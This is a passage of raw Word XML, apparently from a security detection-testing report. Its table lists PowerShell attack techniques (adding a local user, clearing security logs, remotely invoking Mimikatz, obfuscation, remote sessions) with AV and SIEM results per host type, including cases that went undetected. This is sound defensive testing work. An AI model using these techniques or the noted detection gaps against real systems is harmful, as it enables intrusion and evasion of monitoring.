            <w:shd w:val="clear" w:color="auto" w:fill="9CC2E5" w:themeFill="accent1" w:themeFillTint="99"/>
          </w:tcPr>
          <w:p w14:paraId="6AFAFFA0" w14:textId="77777777" w:rsidR="0031379D" w:rsidRDefault="0031379D" w:rsidP="007E0CF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Internal Windows Server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14:paraId="3A2D8833" w14:textId="77777777" w:rsidR="0031379D" w:rsidRDefault="0031379D" w:rsidP="007E0CFA">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>DMZ Windows Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2322" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="9CC2E5" w:themeFill="accent1" w:themeFillTint="99"/>
          </w:tcPr>
          <w:p w14:paraId="7FCED5BB" w14:textId="77777777" w:rsidR="0031379D" w:rsidRDefault="0031379D" w:rsidP="007E0CFA">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Windows Desktop</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0031379D" w14:paraId="54682030" w14:textId="77777777" w:rsidTr="007E0CFA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3438" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72E4B423" w14:textId="77777777" w:rsidR="0031379D" w:rsidRDefault="0031379D" w:rsidP="007E0CFA">
            <w:r>
              <w:t xml:space="preserve">PS Add Local User  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="046CFEF5" w14:textId="77777777" w:rsidR="0031379D" w:rsidRDefault="0031379D" w:rsidP="007E0CFA"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2610" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42336F86" w14:textId="33CCB750" w:rsidR="0031379D" w:rsidRDefault="0031379D" w:rsidP="0031379D">
            <w:r>
              <w:t>Policy blocked. Data exists. SIEM alerted.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A4A3CCC" w14:textId="5480127D" w:rsidR="0031379D" w:rsidRDefault="0031379D" w:rsidP="007E0CFA">
            <w:r>
              <w:t>Policy blocked. Data exists. SIEM alerted.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2322" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D0B4523" w14:textId="71A53046" w:rsidR="0031379D" w:rsidRDefault="0031379D" w:rsidP="0031379D">
            <w:r>
              <w:t xml:space="preserve">Event not logged. Not detected. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0031379D" w14:paraId="72E6EA07" w14:textId="77777777" w:rsidTr="007E0CFA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3438" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39A7AE6D" w14:textId="77777777" w:rsidR="0031379D" w:rsidRDefault="0031379D" w:rsidP="007E0CFA">
            <w:r>
              <w:t xml:space="preserve">PS Clear Event Log of Security Events  </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2610" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70DB4F08" w14:textId="505AF6C8" w:rsidR="0031379D" w:rsidRDefault="0031379D" w:rsidP="007E0CFA">
            <w:r>
              <w:t>Data exists. SIEM alerted.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2873D208" w14:textId="1FF15225" w:rsidR="0031379D" w:rsidRDefault="0031379D" w:rsidP="007E0CFA">
            <w:r>
              <w:t>Data exists. SIEM alerted.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2322" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E4D3493" w14:textId="533950EA" w:rsidR="0031379D" w:rsidRDefault="0031379D" w:rsidP="0031379D">
            <w:r>
              <w:t>Data exists. SIEM did not alert.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0031379D" w14:paraId="6E0E9451" w14:textId="77777777" w:rsidTr="007E0CFA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3438" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FAD0DD9" w14:textId="77777777" w:rsidR="0031379D" w:rsidRDefault="0031379D" w:rsidP="007E0CFA">
            <w:r>
              <w:t xml:space="preserve">PS Invoke </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CF908AF" w14:textId="77777777" w:rsidR="0031379D" w:rsidRDefault="0031379D" w:rsidP="007E0CFA">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Mimikatz</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> from Remote Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2610" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08CF0D06" w14:textId="396E1038" w:rsidR="0031379D" w:rsidRDefault="0031379D" w:rsidP="0031379D">
            <w:r>
              <w:t>AV blocked. Data exists. SIEM did not alert because the number of events was below the alert threshold.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A3364CB" w14:textId="5185F7E7" w:rsidR="0031379D" w:rsidRDefault="0031379D" w:rsidP="0031379D">
            <w:r>
              <w:t>AV blocked. Data exists. SIEM alerted.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2322" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70AE6967" w14:textId="1D6FE885" w:rsidR="0031379D" w:rsidRDefault="0031379D" w:rsidP="007E0CFA">
            <w:r>
              <w:t>AV blocked. Data exists. SIEM did not alert because the number of events was below the alert threshold.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0031379D" w14:paraId="114FD56F" w14:textId="77777777" w:rsidTr="007E0CFA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3438" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="405CEA07" w14:textId="77777777" w:rsidR="0031379D" w:rsidRDefault="0031379D" w:rsidP="007E0CFA">
            <w:r>
              <w:t>PS Obfuscation Tests.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="478AD919" w14:textId="77777777" w:rsidR="0031379D" w:rsidRDefault="0031379D" w:rsidP="007E0CFA"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2610" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34B763A8" w14:textId="608AC625" w:rsidR="0031379D" w:rsidRDefault="0031379D" w:rsidP="007E0CFA">
            <w:r>
              <w:t>AV blocked. Data exists. SIEM did not alert because the number of events was below the alert threshold.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A76FA1F" w14:textId="277D3C1B" w:rsidR="0031379D" w:rsidRDefault="0031379D" w:rsidP="007E0CFA">
            <w:r>
              <w:t>AV blocked. Data exists. SIEM alerted.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2322" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41666C26" w14:textId="04FBED99" w:rsidR="0031379D" w:rsidRDefault="0031379D" w:rsidP="007E0CFA">
            <w:r>
              <w:t>Event not logged. Not detected.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0031379D" w14:paraId="5A76B3C7" w14:textId="77777777" w:rsidTr="007E0CFA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3438" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EBBBED1" w14:textId="77777777" w:rsidR="0031379D" w:rsidRDefault="0031379D" w:rsidP="007E0CFA">
            <w:r>
              <w:t>PS Session Creation and Use.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43943A4F" w14:textId="77777777" w:rsidR="0031379D" w:rsidRDefault="0031379D" w:rsidP="007E0CFA"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2610" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="288DAF22" w14:textId="4FC6A7EA" w:rsidR="0031379D" w:rsidRDefault="0031379D" w:rsidP="007E0CFA">
            <w:r>
              <w:t>Data exists. SIEM did not alert.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E847B4C" w14:textId="3AC6F4F8" w:rsidR="0031379D" w:rsidRDefault="0031379D" w:rsidP="007E0CFA">
            <w:r>
              <w:t>Data exists. SIEM did not alert.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2322" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B7B0B8C" w14:textId="1DDACB64" w:rsidR="0031379D" w:rsidRDefault="0031379D" w:rsidP="007E0CFA">
            <w:r>
              <w:t>Firewalls blocked. Data exists. SIEM did not alert.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="09EB7BB9" w14:textId="317DB9C9" w:rsidR="205F5C7F" w:rsidRDefault="205F5C7F" w:rsidP="205F5C7F"/>
    <w:p w14:paraId="666A1B4C" w14:textId="131DBF5C" w:rsidR="2F1E0F12" w:rsidRDefault="2F1E0F12" w:rsidP="5108D16B"/>
    <w:p w14:paraId="1B698795" w14:textId="77D4DF6D" w:rsidR="5384129B" w:rsidRDefault="5384129B" w:rsidP="205F5C7F"/>
    <w:p w14:paraId="1528198F" w14:textId="4849709B" w:rsidR="205F5C7F" w:rsidRDefault="205F5C7F" w:rsidP="205F5C7F"/>
    <w:p w14:paraId="4793BADD" w14:textId="118B8CDB" w:rsidR="205F5C7F" w:rsidRDefault="205F5C7F" w:rsidP="205F5C7F"/>
    <w:sectPr w:rsidR="205F5C7F" w:rsidSect="006F5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9ED1C" w14:textId="77777777" w:rsidR="005B1560" w:rsidRDefault="005B1560" w:rsidP="00023FAE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1923BCF3" w14:textId="77777777" w:rsidR="005B1560" w:rsidRDefault="005B1560" w:rsidP="0002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64A34" w14:textId="77777777" w:rsidR="005B1560" w:rsidRDefault="005B1560" w:rsidP="00023FAE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="02D95F37" w14:textId="77777777" w:rsidR="005B1560" w:rsidRDefault="005B1560" w:rsidP="0002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744"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="354A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47C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="795E8DB6"/>
    <w:lvl w:ilvl="0" w:tplc="4C5A911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259D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2B5C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6212"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E0A6006E"/>
    <w:lvl w:ilvl="0" w:tplc="F912B6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44454CE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656C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="36769D2A"/>
    <w:lvl w:ilvl="0" w:tplc="CEFC1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E6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E8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4D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E7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AB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E2D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28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932BD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="11D22AA2"/>
    <w:lvl w:ilvl="0" w:tplc="F912B6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71F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C320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C2FB1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AD76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3563"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D0F03DD0"/>
    <w:lvl w:ilvl="0" w:tplc="86D4D7DC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E5C16"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D2D4C1F6"/>
    <w:lvl w:ilvl="0" w:tplc="F35C9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531D9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2EFE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8469A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4E72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42D0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D876D498"/>
    <w:lvl w:ilvl="0" w:tplc="239A4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AC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82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42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6B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804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A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00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825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F383A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5D2E4A3C"/>
    <w:lvl w:ilvl="0" w:tplc="A844BD3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23A54"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3BCA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F57BB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFF4B962"/>
    <w:lvl w:ilvl="0" w:tplc="0484A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5C53D7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B86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16F95"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F73C6210"/>
    <w:lvl w:ilvl="0" w:tplc="3058040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E6655"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2B5C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07CBD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="60F8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A2E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A856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B0B66"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="14D4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1DE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4E72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54D30"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="309C4692"/>
    <w:lvl w:ilvl="0" w:tplc="083AD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35FF6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="54D4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1FA5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0B028DE4"/>
    <w:lvl w:ilvl="0" w:tplc="266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F7174"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="126AB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C4DF9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E668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6C0F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2FC8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E236B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6656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1387D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B8FC3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603B1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B406544"/>
    <w:lvl w:ilvl="0" w:tplc="FD22BC2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4"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="19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21"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="2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AE"/>
    <w:rsid w:val="00023FAE"/>
    <w:rsid w:val="00041B91"/>
    <w:rsid w:val="000F3AE7"/>
    <w:rsid w:val="00107631"/>
    <w:rsid w:val="00110B0C"/>
    <w:rsid w:val="00140664"/>
    <w:rsid w:val="00183F0A"/>
    <w:rsid w:val="001B42C3"/>
    <w:rsid w:val="001D44CE"/>
    <w:rsid w:val="001E6D1B"/>
    <w:rsid w:val="00210A94"/>
    <w:rsid w:val="00214352"/>
    <w:rsid w:val="00265AA9"/>
    <w:rsid w:val="002B4836"/>
    <w:rsid w:val="00303735"/>
    <w:rsid w:val="0031343F"/>
    <w:rsid w:val="0031379D"/>
    <w:rsid w:val="00327EBF"/>
    <w:rsid w:val="003300D9"/>
    <w:rsid w:val="00331A9F"/>
    <w:rsid w:val="00335942"/>
    <w:rsid w:val="003C03C8"/>
    <w:rsid w:val="003F5FE5"/>
    <w:rsid w:val="00405469"/>
    <w:rsid w:val="00406BF5"/>
    <w:rsid w:val="004517ED"/>
    <w:rsid w:val="004578F4"/>
    <w:rsid w:val="00467312"/>
    <w:rsid w:val="004860BA"/>
    <w:rsid w:val="004C34B1"/>
    <w:rsid w:val="004E2657"/>
    <w:rsid w:val="004F5C2D"/>
    <w:rsid w:val="00504323"/>
    <w:rsid w:val="00523800"/>
    <w:rsid w:val="005B1560"/>
    <w:rsid w:val="005C02C3"/>
    <w:rsid w:val="00607F5D"/>
    <w:rsid w:val="006616A2"/>
    <w:rsid w:val="00686326"/>
    <w:rsid w:val="006D16B9"/>
    <w:rsid w:val="006E673A"/>
    <w:rsid w:val="006F34A2"/>
    <w:rsid w:val="006F5420"/>
    <w:rsid w:val="00705AEB"/>
    <w:rsid w:val="00724ECF"/>
    <w:rsid w:val="00740DAE"/>
    <w:rsid w:val="007456D5"/>
    <w:rsid w:val="007A5F0D"/>
    <w:rsid w:val="007D10B1"/>
    <w:rsid w:val="007E43C6"/>
    <w:rsid w:val="008157D4"/>
    <w:rsid w:val="008416B5"/>
    <w:rsid w:val="008521A2"/>
    <w:rsid w:val="0085258E"/>
    <w:rsid w:val="0085728D"/>
    <w:rsid w:val="00861BBF"/>
    <w:rsid w:val="00886DA9"/>
    <w:rsid w:val="008A76C5"/>
    <w:rsid w:val="008F454B"/>
    <w:rsid w:val="009340A8"/>
    <w:rsid w:val="009627FC"/>
    <w:rsid w:val="00973978"/>
    <w:rsid w:val="00973A5F"/>
    <w:rsid w:val="009A197D"/>
    <w:rsid w:val="009E0DD3"/>
    <w:rsid w:val="00AF46C5"/>
    <w:rsid w:val="00BA190B"/>
    <w:rsid w:val="00BC36A4"/>
    <w:rsid w:val="00BC5956"/>
    <w:rsid w:val="00BF1B92"/>
    <w:rsid w:val="00BF5037"/>
    <w:rsid w:val="00BF52D9"/>
    <w:rsid w:val="00C023E8"/>
    <w:rsid w:val="00C76DFC"/>
    <w:rsid w:val="00C82EB6"/>
    <w:rsid w:val="00CA60EE"/>
    <w:rsid w:val="00CA7FE4"/>
    <w:rsid w:val="00CB2EC2"/>
    <w:rsid w:val="00CE4B18"/>
    <w:rsid w:val="00D127AF"/>
    <w:rsid w:val="00D26260"/>
    <w:rsid w:val="00D300F2"/>
    <w:rsid w:val="00D5E475"/>
    <w:rsid w:val="00D77185"/>
    <w:rsid w:val="00DC02DB"/>
    <w:rsid w:val="00E471DB"/>
    <w:rsid w:val="00E83C39"/>
    <w:rsid w:val="00EB62CB"/>
    <w:rsid w:val="00EF3161"/>
    <w:rsid w:val="00F05D49"/>
    <w:rsid w:val="00F35219"/>
    <w:rsid w:val="00F356F9"/>
    <w:rsid w:val="00F85836"/>
    <w:rsid w:val="00FA02C6"/>
    <w:rsid w:val="00FB4D97"/>
    <w:rsid w:val="00FD6F3C"/>
    <w:rsid w:val="00FE3E66"/>
    <w:rsid w:val="02A38077"/>
    <w:rsid w:val="02F8BB07"/>
    <w:rsid w:val="04F57516"/>
    <w:rsid w:val="063564E4"/>
    <w:rsid w:val="06E0AC3B"/>
    <w:rsid w:val="077AA520"/>
    <w:rsid w:val="0884D5F6"/>
    <w:rsid w:val="0901DA86"/>
    <w:rsid w:val="0920793A"/>
    <w:rsid w:val="09AD3979"/>
    <w:rsid w:val="0A3F1640"/>
    <w:rsid w:val="0BA6BE6F"/>
    <w:rsid w:val="0CB5B75C"/>
    <w:rsid w:val="0CC599FD"/>
    <w:rsid w:val="0CECA3BC"/>
    <w:rsid w:val="0E11A2FE"/>
    <w:rsid w:val="0E433D93"/>
    <w:rsid w:val="1315BA15"/>
    <w:rsid w:val="1360156C"/>
    <w:rsid w:val="14BA48F5"/>
    <w:rsid w:val="171544E5"/>
    <w:rsid w:val="176FFCA6"/>
    <w:rsid w:val="1AB320E4"/>
    <w:rsid w:val="1B37A8EA"/>
    <w:rsid w:val="1BACFE29"/>
    <w:rsid w:val="1C477FB9"/>
    <w:rsid w:val="1C63ADDA"/>
    <w:rsid w:val="1D184457"/>
    <w:rsid w:val="1D303EB1"/>
    <w:rsid w:val="1D3A327D"/>
    <w:rsid w:val="1EF0E8AE"/>
    <w:rsid w:val="204CAE12"/>
    <w:rsid w:val="205F5C7F"/>
    <w:rsid w:val="20EB76F0"/>
    <w:rsid w:val="216C5CE6"/>
    <w:rsid w:val="218165EB"/>
    <w:rsid w:val="2421A8C9"/>
    <w:rsid w:val="25502875"/>
    <w:rsid w:val="26AACA71"/>
    <w:rsid w:val="26CCABEB"/>
    <w:rsid w:val="26E7BB5C"/>
    <w:rsid w:val="26FFF917"/>
    <w:rsid w:val="27899F2A"/>
    <w:rsid w:val="284830C4"/>
    <w:rsid w:val="293B3468"/>
    <w:rsid w:val="2BA4B9A5"/>
    <w:rsid w:val="2D9BDA77"/>
    <w:rsid w:val="2F1E0F12"/>
    <w:rsid w:val="2F6485A8"/>
    <w:rsid w:val="3029BD02"/>
    <w:rsid w:val="30C4B986"/>
    <w:rsid w:val="30CC0E62"/>
    <w:rsid w:val="32BD4CFF"/>
    <w:rsid w:val="34774221"/>
    <w:rsid w:val="34C0EF78"/>
    <w:rsid w:val="362660A6"/>
    <w:rsid w:val="3868CBD5"/>
    <w:rsid w:val="38DD4285"/>
    <w:rsid w:val="39B0AAAF"/>
    <w:rsid w:val="3A162102"/>
    <w:rsid w:val="3A79A1C3"/>
    <w:rsid w:val="3AA65443"/>
    <w:rsid w:val="3BD983D9"/>
    <w:rsid w:val="3F0F72A7"/>
    <w:rsid w:val="40E66411"/>
    <w:rsid w:val="40FBB7D7"/>
    <w:rsid w:val="41213A6B"/>
    <w:rsid w:val="41670311"/>
    <w:rsid w:val="42FB4C14"/>
    <w:rsid w:val="44CDCD46"/>
    <w:rsid w:val="452B050F"/>
    <w:rsid w:val="45A123B6"/>
    <w:rsid w:val="4693CA8A"/>
    <w:rsid w:val="46E19D5C"/>
    <w:rsid w:val="4806472A"/>
    <w:rsid w:val="481A14BF"/>
    <w:rsid w:val="483D4653"/>
    <w:rsid w:val="48A04A84"/>
    <w:rsid w:val="4A2C45D8"/>
    <w:rsid w:val="4B1D6146"/>
    <w:rsid w:val="4B20C04F"/>
    <w:rsid w:val="4B64746F"/>
    <w:rsid w:val="4CD31639"/>
    <w:rsid w:val="4CFD872F"/>
    <w:rsid w:val="4DE433A4"/>
    <w:rsid w:val="5108D16B"/>
    <w:rsid w:val="510FE2AD"/>
    <w:rsid w:val="5384129B"/>
    <w:rsid w:val="5580BF54"/>
    <w:rsid w:val="55815834"/>
    <w:rsid w:val="55BA2A16"/>
    <w:rsid w:val="55D4D3E0"/>
    <w:rsid w:val="57120FAB"/>
    <w:rsid w:val="5796F806"/>
    <w:rsid w:val="57FFA198"/>
    <w:rsid w:val="590A3F0F"/>
    <w:rsid w:val="593DB88D"/>
    <w:rsid w:val="59E32F49"/>
    <w:rsid w:val="5AE9F28F"/>
    <w:rsid w:val="5AF62CD9"/>
    <w:rsid w:val="5DAD9E9C"/>
    <w:rsid w:val="5DC154F3"/>
    <w:rsid w:val="5E1753AF"/>
    <w:rsid w:val="5E1F14D4"/>
    <w:rsid w:val="5E3FC118"/>
    <w:rsid w:val="5E97D053"/>
    <w:rsid w:val="5F1A391D"/>
    <w:rsid w:val="5FB2E12A"/>
    <w:rsid w:val="60564E38"/>
    <w:rsid w:val="613D32E4"/>
    <w:rsid w:val="614F35A3"/>
    <w:rsid w:val="61DEDF05"/>
    <w:rsid w:val="62050089"/>
    <w:rsid w:val="638FC34A"/>
    <w:rsid w:val="64D118BD"/>
    <w:rsid w:val="664DCC8A"/>
    <w:rsid w:val="66F5E3FC"/>
    <w:rsid w:val="67D91F3B"/>
    <w:rsid w:val="6880815D"/>
    <w:rsid w:val="6A00BBAA"/>
    <w:rsid w:val="6A2D84BE"/>
    <w:rsid w:val="6AC102DB"/>
    <w:rsid w:val="6AF40C80"/>
    <w:rsid w:val="6AFA5147"/>
    <w:rsid w:val="6C30B4AD"/>
    <w:rsid w:val="6C4F511B"/>
    <w:rsid w:val="6CB40BA8"/>
    <w:rsid w:val="6D8A688D"/>
    <w:rsid w:val="6E425CD1"/>
    <w:rsid w:val="702CD4C9"/>
    <w:rsid w:val="725D4B59"/>
    <w:rsid w:val="73751F88"/>
    <w:rsid w:val="73A20231"/>
    <w:rsid w:val="7440ACCB"/>
    <w:rsid w:val="7597F66A"/>
    <w:rsid w:val="7637353D"/>
    <w:rsid w:val="7701C8EE"/>
    <w:rsid w:val="7926D1C2"/>
    <w:rsid w:val="794668C1"/>
    <w:rsid w:val="7968FE15"/>
    <w:rsid w:val="7A4D90F1"/>
    <w:rsid w:val="7A603BC0"/>
    <w:rsid w:val="7A89005A"/>
    <w:rsid w:val="7CC6F6BC"/>
    <w:rsid w:val="7D1F01CF"/>
    <w:rsid w:val="7D2A8BFD"/>
    <w:rsid w:val="7D4E17FE"/>
    <w:rsid w:val="7DE2CE57"/>
    <w:rsid w:val="7DEA8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DBB2D6"/>
  <w15:docId w15:val="{692F8536-A7CD-40AA-B7B4-D7DC9231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AE"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00023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AE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00023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F46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6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6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6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6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2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7AF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l-c1">
    <w:name w:val="pl-c1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D127AF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-s">
    <w:name w:val="pl-s"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D127AF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-pds">
    <w:name w:val="pl-pds"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D127AF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-k">
    <w:name w:val="pl-k"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D127AF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-c">
    <w:name w:val="pl-c"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D127AF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-smi">
    <w:name w:val="pl-smi"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D127AF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
